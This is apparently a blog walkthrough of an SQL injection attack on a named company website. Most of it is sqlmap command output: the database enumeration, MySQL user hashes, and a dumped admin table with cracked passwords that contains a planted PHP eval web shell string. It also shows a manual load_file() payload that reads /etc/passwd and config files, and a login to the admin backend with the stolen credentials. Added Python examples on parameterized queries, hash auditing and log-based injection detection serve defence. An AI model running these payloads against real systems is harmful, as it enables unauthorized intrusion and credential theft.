
SQL injection, next level: running at MySQL

2016-07-11 13:32, 411 views
1. As before, a Google keyword search turned up a site that looked a bit harder than usual: http://www.konzern.com.cn/about/index.php?id=2



2. The testing itself needs no explanation; just run sqlmap against it.

(1) First, check which database it is. Pointless, really, since the title already gave it away.

c:\Python27\sqlmap>sqlmap.py -u http://www.konzern.com.cn/about/index.php?id=2 --dbs

[sqlmap ASCII-art banner] {1.0.6.66#dev} http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 11:37:26

[11:37:26] [INFO] resuming back-end DBMS 'mysql'

[11:37:26] [INFO] testing connection to the target URL

[11:37:27] [WARNING] there is a DBMS error found in the HTTP response body which could interfere with the results of the tests

sqlmap resumed the following injection point(s) from stored session:

---

Parameter: id (GET)

Type: boolean-based blind

Title: AND boolean-based blind - WHERE or HAVING clause

Payload: id=1 AND 4222=4222

Type: AND/OR time-based blind

Title: MySQL <= 5.0.11 AND time-based blind (heavy query)

Payload: id=1 AND 8220=BENCHMARK(5000000,MD5(0x58466d44))

Type: UNION query

Title: Generic UNION query (NULL) - 2 columns

Payload: id=-7699 UNION ALL SELECT CONCAT(0x7170717071,0x65665577634e784367596844557554664e6e45757947745955615469565a4741437167627648536c,0x7176766b71),NULL-- wfqe

---

[11:37:27] [INFO] the back-end DBMS is MySQL

web application technology: PHP 5.6.9

back-end DBMS: MySQL <= 5.0.11

[11:37:27] [INFO] fetching database names

[11:37:27] [WARNING] the SQL query provided does not return any output

[11:37:27] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'

[11:37:27] [INFO] fetching number of databases

[11:37:27] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval

[11:37:27] [INFO] retrieved:

[11:37:31] [WARNING] (case) time-based comparison requires larger statistical model, please wait.............................. (done)

[11:37:51] [CRITICAL] considerable lagging has been detected in connection response(s). Please use as high value for option '--time-sec' as possible (e.g. 10 or more)

[11:37:52] [WARNING] it is very important to not stress the network adapter during usage of time-based payloads to prevent potential disruptions

[11:37:52] [ERROR] unable to retrieve the number of databases

[11:37:52] [INFO] falling back to current database

[11:37:52] [INFO] fetching current database

available databases [1]:

[*] kg

[11:37:52] [INFO] fetched data logged to text files under 'C:\Users\jlz\.sqlmap\output\www.konzern.com.cn'

[*] shutting down at 11:37:52
The result shows the database is MySQL and the database name is kg, Durant's initials. Is this developer a basketball fan? Durant has gone to the Warriors, though; as a man that choice looks a bit like riding someone's coattails, but he probably had his reasons: in game seven of this year's Western Conference finals, a teammate with nobody within three metres still didn't dare to shoot, and Durant yelled at him in frustration.
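The injection sqlmap reports above (a two-column UNION through the id parameter) only exists because the page builds its SQL by concatenating the raw query-string value. The following is an added example, not code from the site or from sqlmap: it rebuilds the situation on an in-memory SQLite database with an assumed schema (an about table read by id and an admin table with user/pwd columns, all values constructed), runs a payload of the same shape as the one sqlmap found against a concatenated query, and then against a query that validates the type and binds the value as a parameter.

```python
import sqlite3


def make_db():
    """Constructed stand-in for the site's schema; the hash value is made up."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE about (id INTEGER PRIMARY KEY, title TEXT, body TEXT);
        INSERT INTO about VALUES (1, 'Home', 'welcome'),
                                 (2, 'About us', 'company history');
        CREATE TABLE admin (id INTEGER PRIMARY KEY, user TEXT, pwd TEXT);
        INSERT INTO admin VALUES (12, 'konzern', 'deadbeefdeadbeefdeadbeefdeadbeef');
    """)
    return db


def fetch_about_vulnerable(db, raw_id):
    """Concatenated query: whatever arrives in ?id= is parsed as SQL."""
    sql = "SELECT title, body FROM about WHERE id=" + raw_id
    return db.execute(sql).fetchall()


def fetch_about_hardened(db, raw_id):
    """Reject non-integer ids up front, then bind the value as a parameter.

    Binding alone already stops the injection (the value can never become SQL
    syntax); the int() check is defence in depth and gives a clean 4xx path.
    """
    try:
        id_value = int(raw_id)
    except ValueError:
        return []
    sql = "SELECT title, body FROM about WHERE id=?"
    return db.execute(sql, (id_value,)).fetchall()


# Same shape as the UNION payload in the sqlmap output: a negative id so the
# real row drops out, then two attacker-chosen columns and a trailing comment.
PAYLOAD = "-7699 UNION ALL SELECT user||':'||pwd, NULL FROM admin-- wfqe"

if __name__ == "__main__":
    db = make_db()
    print("vulnerable, normal id :", fetch_about_vulnerable(db, "2"))
    print("vulnerable, payload   :", fetch_about_vulnerable(db, PAYLOAD))
    print("hardened, normal id   :", fetch_about_hardened(db, "2"))
    print("hardened, payload     :", fetch_about_hardened(db, PAYLOAD))
```

In the concatenated version the payload returns the admin row in place of the page content, which is exactly what lets sqlmap dump kg.admin later in this write-up; in the bound version the same input yields no row at all.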
(2) Since it is MySQL, grab the database user name and password first.

c:\Python27\sqlmap>sqlmap.py -u http://www.konzern.com.cn/about/index.php?id=2 --current-user


[*] starting at 11:38:12

[11:38:13] [INFO] resuming back-end DBMS 'mysql'

[11:38:13] [INFO] testing connection to the target URL

[11:38:14] [WARNING] there is a DBMS error found in the HTTP response body which could interfere with the results of the tests

sqlmap resumed the following injection point(s) from stored session:

---

Parameter: id (GET)

Type: boolean-based blind

Title: AND boolean-based blind - WHERE or HAVING clause

Payload: id=1 AND 4222=4222

Type: AND/OR time-based blind

Title: MySQL <= 5.0.11 AND time-based blind (heavy query)

Payload: id=1 AND 8220=BENCHMARK(5000000,MD5(0x58466d44))

Type: UNION query

Title: Generic UNION query (NULL) - 2 columns

Payload: id=-7699 UNION ALL SELECT CONCAT(0x7170717071,0x65665577634e784367596844557554664e6e45757947745955615469565a4741437167627648536c,0x7176766b71),NULL-- wfqe

---

[11:38:14] [INFO] the back-end DBMS is MySQL

web application technology: PHP 5.6.9

back-end DBMS: MySQL <= 5.0.11

[11:38:14] [INFO] fetching current user

current user: 'root@localhost'

[11:38:14] [INFO] fetched data logged to text files under 'C:\Users\jlz\.sqlmap\output\www.konzern.com.cn'

[*] shutting down at 11:38:14
From this you can see the current user is a local user, which means the database and the web service are on the same server.

c:\Python27\sqlmap>sqlmap.py -u http://www.konzern.com.cn/about/index.php?id=2 --password


[*] starting at 11:38:26

[11:38:26] [INFO] resuming back-end DBMS 'mysql'

[11:38:26] [INFO] testing connection to the target URL

[11:38:27] [WARNING] there is a DBMS error found in the HTTP response body which could interfere with the results of the tests

sqlmap resumed the following injection point(s) from stored session:

---

Parameter: id (GET)

Type: boolean-based blind

Title: AND boolean-based blind - WHERE or HAVING clause

Payload: id=1 AND 4222=4222

Type: AND/OR time-based blind

Title: MySQL <= 5.0.11 AND time-based blind (heavy query)

Payload: id=1 AND 8220=BENCHMARK(5000000,MD5(0x58466d44))

Type: UNION query

Title: Generic UNION query (NULL) - 2 columns

Payload: id=-7699 UNION ALL SELECT CONCAT(0x7170717071,0x65665577634e784367596844557554664e6e45757947745955615469565a4741437167627648536c,0x7176766b71),NULL-- wfqe

---

[11:38:27] [INFO] the back-end DBMS is MySQL

web application technology: PHP 5.6.9

back-end DBMS: MySQL <= 5.0.11

[11:38:27] [INFO] fetching database users password hashes

[11:38:27] [INFO] the SQL query used returns 15 entries

[11:38:27] [INFO] retrieved: "root",""

[11:38:28] [INFO] retrieved: "root",""

[11:38:28] [INFO] retrieved: "",""

[11:38:28] [INFO] retrieved: "",""

[11:38:28] [INFO] retrieved: "coremail","*B3FA81D652FE904AE8EEB21507D03E45C5C...

[11:38:29] [INFO] retrieved: "tslocal","*6928D47E7D6B188943617D47B312DB23355A...

[11:38:30] [INFO] retrieved: "ts24","*F51239D6AA282385073A599091A2FDB38E06420D"

[11:38:30] [INFO] retrieved: "konzern","*5CA9DC02DE7B499F9252B93DC1C3197BE55C...

[11:38:33] [INFO] retrieved: "konzern","*5CA9DC02DE7B499F9252B93DC1C3197BE55C...

[11:38:34] [INFO] retrieved: "monitor","*DA34EBCBAD8C5A4F67284295C6B70810926F...

[11:38:34] [INFO] retrieved: "monitor","*DA34EBCBAD8C5A4F67284295C6B70810926F...

[11:38:34] [INFO] retrieved: "root",""

[11:38:34] [INFO] retrieved: "butt","*196BDEDE2AE4F84CA44C47D54D78478C7E2BD7B7"

[11:38:34] [INFO] retrieved: "server","*866D5A029D62EC05ACC4584CE50F1CD2F50E0...

[11:38:38] [INFO] retrieved: "mysqld","*83D34C89B8E0F100D54C6D9276D357DB43E87...

[*] shutting down at 11:39:22
Why so many database users? Because the database ships with a lot of accounts by default.
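The --password run above shows the part that should worry an administrator more than the number of accounts: several root entries with an empty password and an anonymous account. The script below is an added example, not sqlmap code, that reads lines in the same `retrieved: "user","hash"` format, classifies each credential by hash format (empty, mysql_native_password, pre-4.1 16-character, or truncated in the output) and lists the accounts that need attention. The sample lines are constructed; every hash in them is made up rather than taken from the dump above.

```python
import re
from collections import Counter

# Constructed sample in the format sqlmap's --password output uses above.
# The truncated line mirrors how sqlmap cuts long values (no closing quote).
SAMPLE_OUTPUT = """\
[11:38:27] [INFO] retrieved: "root",""
[11:38:28] [INFO] retrieved: "root",""
[11:38:28] [INFO] retrieved: "",""
[11:38:28] [INFO] retrieved: "coremail","*0123456789ABCDEF0123456789ABCDEF01234567"
[11:38:29] [INFO] retrieved: "tslocal","*89ABCDEF0123456789ABCDEF0123456789ABC...
[11:38:30] [INFO] retrieved: "legacy","0123456789abcdef"
[11:38:34] [INFO] retrieved: "app","*FEDCBA9876543210FEDCBA9876543210FEDCBA98"
"""

# Second group runs to end of line so a truncated value is still captured.
LINE_RE = re.compile(r'retrieved: "([^"]*)","([^"\n]*)')


def classify_hash(h):
    """Rough format check of a mysql.user password / authentication_string."""
    if h == "":
        return "empty"
    if re.fullmatch(r"\*[0-9A-Fa-f]{40}", h):
        return "native"             # mysql_native_password (SHA1-based)
    if h.startswith("*") and h.endswith("..."):
        return "native-truncated"   # looks native, but sqlmap cut the line
    if re.fullmatch(r"[0-9A-Fa-f]{16}", h):
        return "pre-4.1"            # old 16-hex-char format, trivially weak
    return "other"


def audit_accounts(output):
    """Return account count, a per-format tally and the findings to act on."""
    accounts = [(user, classify_hash(h)) for user, h in LINE_RE.findall(output)]
    findings = []
    for user, kind in accounts:
        if user == "":
            findings.append("anonymous account with empty password"
                            if kind == "empty" else "anonymous account")
            continue
        if kind == "empty":
            findings.append(f"'{user}': empty password")
        elif kind == "pre-4.1":
            findings.append(f"'{user}': pre-4.1 password hash")
    return {
        "accounts": len(accounts),
        "by_format": dict(Counter(kind for _, kind in accounts)),
        "findings": findings,
    }


if __name__ == "__main__":
    result = audit_accounts(SAMPLE_OUTPUT)
    print(result["accounts"], "accounts:", result["by_format"])
    for f in result["findings"]:
        print(" -", f)
```

sqlmap's --password output does not show the host column, so the same user name appearing three times is three separate user@host rows; fixing them means querying `SELECT user, host FROM mysql.user` on the server itself and dropping or setting passwords on each row, rather than working from this listing.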
(3) Now look at the site's admin user names and passwords.
c:\Python27\sqlmap>sqlmap.py -u http://www.konzern.com.cn/about/index.php?id=2 --dump -T admin


[*] starting at 11:56:13

[11:56:13] [INFO] resuming back-end DBMS 'mysql'

[11:56:13] [INFO] testing connection to the target URL

[11:56:16] [WARNING] there is a DBMS error found in the HTTP response body which could interfere with the results of the tests

sqlmap resumed the following injection point(s) from stored session:

---

Parameter: id (GET)

Type: boolean-based blind

Title: AND boolean-based blind - WHERE or HAVING clause

Payload: id=1 AND 4222=4222

Type: AND/OR time-based blind

Title: MySQL <= 5.0.11 AND time-based blind (heavy query)

Payload: id=1 AND 8220=BENCHMARK(5000000,MD5(0x58466d44))

Type: UNION query

Title: Generic UNION query (NULL) - 2 columns

Payload: id=-7699 UNION ALL SELECT CONCAT(0x7170717071,0x65665577634e784367596844557554664e6e45757947745955615469565a4741437167627648536c,0x7176766b71),NULL-- wfqe

---

[11:56:16] [INFO] the back-end DBMS is MySQL

web application technology: PHP 5.6.9

back-end DBMS: MySQL <= 5.0.11

[11:56:16] [WARNING] missing database parameter. sqlmap is going to use the current database to enumerate table(s) entries

[11:56:16] [INFO] fetching current database

[11:56:16] [INFO] fetching columns for table 'admin' in database 'kg'

[11:56:16] [WARNING] the SQL query provided does not return any output

[11:56:16] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'

[11:56:16] [WARNING] unable to retrieve column names for table 'admin' in database 'kg'

[11:56:16] [INFO] fetching entries for table 'admin' in database 'kg'

[11:56:16] [INFO] the SQL query used returns 22 entries

[11:56:17] [INFO] analyzing table dump for possible password hashes

[11:56:17] [INFO] recognized possible password hashes in column 'pwd'

do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] y

[11:56:19] [INFO] writing hashes to a temporary file 'c:\users\jlz\appdata\local\temp\sqlmaponae9o3480\sqlmaphashes-qdvld9.txt'

do you want to crack them via a dictionary-based attack? [Y/n/q] y

[11:56:21] [INFO] using hash method 'md5_generic_passwd'

[11:56:21] [INFO] resuming password 'test2' for hash 'ad0234829205b9033196ba818f7a872b'

[11:56:21] [INFO] resuming password '123456' for hash 'e10adc3949ba59abbe56e057f20f883e'

[11:56:21] [INFO] resuming password 'test123' for hash 'cc03e747a6afbbcbf8be7668acfebee5'

[11:56:21] [INFO] resuming password 'jodie' for hash '8a8ec34de8f52073fcacf4c974a7cea0'

[11:56:21] [INFO] resuming password '123' for hash '202cb962ac59075b964b07152d234b70'

[11:56:21] [INFO] resuming password 'leo' for hash '0f759dd1ea6c4c76cedc299039ca4f23'

[11:56:21] [INFO] resuming password 'world' for hash '7d793037a0760186574b0282f2f435e7'

[11:56:21] [INFO] resuming password 'alice' for hash '6384e2b2184bcbf58eccf10ca7a6563c'

[11:56:21] [INFO] resuming password '123698745' for hash '4438fc033f8aef433f9db5348b70e8e5'

[11:56:21] [INFO] resuming password '666666' for hash 'f379eaf3c831b04de153469d1bec345e'

what dictionary do you want to use?

[1] default dictionary file 'C:\Python27\sqlmap\txt\wordlist.zip' (press Enter)

[2] custom dictionary file

[3] file with list of dictionary files

>

[11:56:22] [INFO] using default dictionary

do you want to use common password suffixes? (slow!) [y/N]

[11:56:23] [INFO] starting dictionary-based cracking (md5_generic_passwd)

[11:56:23] [INFO] starting 4 processes

[11:56:29] [INFO] current status: 12606... \

[11:56:29] [WARNING] user aborted during dictionary-based attack phase (Ctrl+C was pressed)

[11:56:29] [INFO] postprocessing table dump

Database: kg

Table: admin

[22 entries]

+----+----------------------------------------------+--------------------------+

| id | pwd | user |

+----+----------------------------------------------+--------------------------+

| 12 | bfdb222d429e677e138895c7fbf44721 | konzern |

| 81 | f379eaf3c831b04de153469d1bec345e (666666) | hacker |

| 80 | 4438fc033f8aef433f9db5348b70e8e5 (123698745) | leigege |

| 79 | ef529f393e47059de5b6656856829fee | sky |

| 77 | 6384e2b2184bcbf58eccf10ca7a6563c (alice) | alice |

| 78 | 4438fc033f8aef433f9db5348b70e8e5 (123698745) | yaoleigegea |

| 76 | 7d793037a0760186574b0282f2f435e7 (world) | hello |

| 73 | 202cb962ac59075b964b07152d234b70 (123) | 123 |

| 74 | 9573f82f0adff976411bc4ba919450af | dai |

| 75 | 2c219676360ae415f5b25bf777661f4a | lio |

| 70 | dcb62acff5a147575ebd1f406c0912dd | fomok |

| 71 | 41d4bc20d6cc020a996cb9a6d11f8eeb | weimian |

| 66 | cc03e747a6afbbcbf8be7668acfebee5 (test123) | test1 |

| 69 | 8a8ec34de8f52073fcacf4c974a7cea0 (jodie) | jodie |

| 68 | ad0234829205b9033196ba818f7a872b (test2) | test2 |

| 72 | e10adc3949ba59abbe56e057f20f883e (123456) | <?php eval($_POST[g]);?> |

| 67 | 6f87ab65bc137da2781cabddf5dc1e1a | timo |

| 64 | 1e3851d424d29e3ea3771c90d9e07865 | lao |

| 65 | 202cb962ac59075b964b07152d234b70 (123) | anonymous |

| 63 | 0f759dd1ea6c4c76cedc299039ca4f23 (leo) | leo |

| 62 | 202cb962ac59075b964b07152d234b70 (123) | test |

| 61 | f379eaf3c831b04de153469d1bec345e (666666) | hacker |

+----+----------------------------------------------+--------------------------+

[11:56:29] [INFO] table 'kg.admin' dumped to CSV file 'C:\Users\jlz\.sqlmap\output\www.konzern.com.cn\dump\kg\admin.csv'

[11:56:29] [INFO] fetched data logged to text files under 'C:\Users\jlz\.sqlmap\output\www.konzern.com.cn'

[*] shutting down at 11:56:29
Damn, someone has already broken in. Nothing sophisticated, though, kiddie stuff, and they left a footprint behind: the user hacker.
(4) At this point you need to find the admin backend; the shell can wait, because guessing the backend path is its own craft. Guessing alone won't find it, but the sqlmap user root@localhost shows this is Linux,
so first I'll try reading the local password file /etc/passwd.



Sure enough, it is Linux and local files can be read, so this is probably the root user. Firefox is used here, with an add-on installed to decode the hex.
(5) Now read the source files directly and look for configuration information.



The error message leaks the absolute path.
Enter http://www.konzern.com.cn/about/index.php?id=2%20and%201=2%20union%20select%20load_file(%27/home/webroot/kg/product/indexinfo.php%27%20),1 and view the page source.



This shows the config.php file in the root directory.
With that found, the rest is easy: read config.php the same way.


One more hop leads to mywebmanage/conn.php, the file holding the connection string.
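Every request in steps (1) to (5), from the sqlmap probes to the manual load_file() UNION queries, went through the web server's access log, so this is where a defender would have seen the activity. The following is an added example, not code from the write-up or from any tool it mentions: it parses Apache combined-format lines, URL-decodes the request target and flags the indicator patterns present in this page (UNION ... SELECT, load_file(), BENCHMARK()/SLEEP(), numeric tautologies like AND 1=2, long hex literals, and a sqlmap User-Agent). The log lines are constructed, with documentation-range IP addresses and request shapes modelled on the payloads shown above.

```python
import re
from collections import Counter
from urllib.parse import unquote

# Constructed Apache combined-format lines (IPs from documentation ranges).
SAMPLE_LOG = """\
203.0.113.10 - - [11/Jul/2016:11:37:27 +0800] "GET /about/index.php?id=2 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.10 - - [11/Jul/2016:11:37:27 +0800] "GET /about/index.php?id=1%20AND%204222=4222 HTTP/1.1" 200 5120 "-" "sqlmap/1.0.6.66#dev (http://sqlmap.org)"
203.0.113.10 - - [11/Jul/2016:11:37:31 +0800] "GET /about/index.php?id=1%20AND%208220=BENCHMARK(5000000,MD5(0x58466d44)) HTTP/1.1" 200 5120 "-" "sqlmap/1.0.6.66#dev (http://sqlmap.org)"
198.51.100.7 - - [11/Jul/2016:12:01:05 +0800] "GET /about/index.php?id=2%20and%201=2%20union%20select%20load_file(%27/etc/passwd%27),1 HTTP/1.1" 200 9800 "-" "Mozilla/5.0 (X11; Linux x86_64) Firefox/47.0"
192.0.2.55 - - [11/Jul/2016:12:05:00 +0800] "GET /about/index.php?id=3 HTTP/1.1" 200 4800 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)

# Indicator name and the pattern matched against the URL-decoded target.
INDICATORS = [
    ("union-select", re.compile(r"\bunion\b[\s\S]{0,40}?\bselect\b", re.I)),
    ("load_file",    re.compile(r"\bload_file\s*\(", re.I)),
    ("time-based",   re.compile(r"\b(benchmark|sleep)\s*\(", re.I)),
    ("tautology",    re.compile(r"\b(and|or)\s+\d+\s*=\s*\d+\b", re.I)),
    ("hex-literal",  re.compile(r"\b0x[0-9a-f]{8,}\b", re.I)),
]


def indicators_for(line):
    """Parse one log line; return (match, list of indicator names)."""
    m = LOG_RE.match(line)
    if not m:
        return None, []
    decoded = unquote(m.group("target"))   # %20 -> space, %27 -> quote, ...
    hits = [name for name, rx in INDICATORS if rx.search(decoded)]
    if "sqlmap" in m.group("ua").lower():   # default UA unless --random-agent
        hits.append("scanner-ua")
    return m, hits


def scan_log(text):
    """Return one alert per request that matched at least one indicator."""
    alerts = []
    for line in text.splitlines():
        m, hits = indicators_for(line)
        if m and hits:
            alerts.append({"ip": m.group("ip"),
                           "target": unquote(m.group("target")),
                           "indicators": hits})
    return alerts


def alerts_by_ip(alerts):
    """Count alerts per client so repeated probing stands out."""
    return dict(Counter(a["ip"] for a in alerts))


if __name__ == "__main__":
    found = scan_log(SAMPLE_LOG)
    for a in found:
        print(a["ip"], a["indicators"], a["target"])
    print(alerts_by_ip(found))
```

Decoding before matching matters: the manual load_file() request in this write-up is sent with %20 and %27 and would slip past a pattern applied to the raw line. The User-Agent check is the weakest signal, since sqlmap changes it on request, which is why the decoded query patterns carry the detection.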
(6) Now test whether the mywebmanage path is the admin backend: http://www.konzern.com.cn/mywebmanage/web_manage.php


Try the database password read a moment ago.
OK, we are into the backend.


4. System privilege escalation: some other time.